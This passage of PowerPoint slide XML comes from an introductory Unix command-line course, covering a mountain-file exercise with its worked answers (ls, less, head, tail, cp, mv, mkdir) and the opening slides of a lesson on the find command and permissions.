                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, rather than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a mountain range has a two-word name (e.g., “Swiss Alps”), use a hyphen to separate the two words, rather than a space (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>swiss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-alps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember that you can rename things as you copy and move them!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1122994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 Moving Mountains</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1447800"/>
            <a:ext cx="7886700" cy="5189220"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Goal:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1. Navigate to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>exercise3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>list the files in the directory in such a fashion that you can see the file size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(cd exercise3, ls –l)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AnnapurnaI.txt, Mont-Blanc.txt, Mount-Elbert.txt – any option; K2 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>less</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Mount-Everest.txt – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>head</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>; Mount-Mitchell.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>- tail</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>3. Determine which mountain has the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>lowest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> elevation: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	Mount Mitchell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5. Create a copy of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>K2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Chhogori.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in its appropriate folder. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> K2.txt /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>karakoram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Chhogori.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>6. Then move </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>K2.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> into the appropriate folder, but rename it </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Mount-Godwin-Austen.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mv K2.txt /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>karakoram</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/Mount-Godwin-Austen.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>7. The mountains in their folders:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Appalachian-Mountains: Mount-Mitchell.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Himalayas: AnnapurnaI.txt, Mount-Everest.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Karakoram-Mountains: K2.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Rocky-Mountains: Mount-Elbert.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Swiss-Alps: Mont-Blanc.txt </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>8. Create a folder called deadliest-mountain. Copy the deadliest mountain’s file into this folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>mkdir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> deadliest-mountain</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>himalayas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="2308E8"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/AnnapurnaI.txt deadliest-mountain/AnnapurnaI.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21827982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Lesson 4: </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Finding Things </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>and Permissions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Overview:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4.1: Finding Files</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>4.2: Permissions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Exercise 4: Super Mario Bros</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26925357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4.1: Find</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Command:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find &lt;search-space&gt; &lt;criteria&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>What it does:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Searches the folders and files in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;search-space&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(which should be a directory) and finds any that match </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;criteria&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="24617432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4.1: Find &lt;search-space&gt;</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Special Options for &lt;search-space&gt;:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>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smtClean="0"/>
              <a:t>: searches the current directory and subdirectories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>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smtClean="0"/>
              <a:t>: searches starting from the directory above you, and all 			subdirectories</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>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smtClean="0"/>
              <a:t>: searches ALL directories and subdirectories that you have access to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find /dir1 /dir2 /dir3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>: searches </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir3</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67408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4.1: Find Special Options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="8073140" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Syntax:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>find . -&lt;option&gt; &lt;criteria&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Note: For these options, you must have the EXACT file name. These (alone) do not search for file names containing your search term!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-name &lt;filename&gt; : Searches for a file called &lt;filename&gt;; CASE SENSITIVE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;filename&gt; : Searches for a file called &lt;filename&gt;; CASE INSENSITIVE </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29960390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4.1: Find &lt;criteria&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
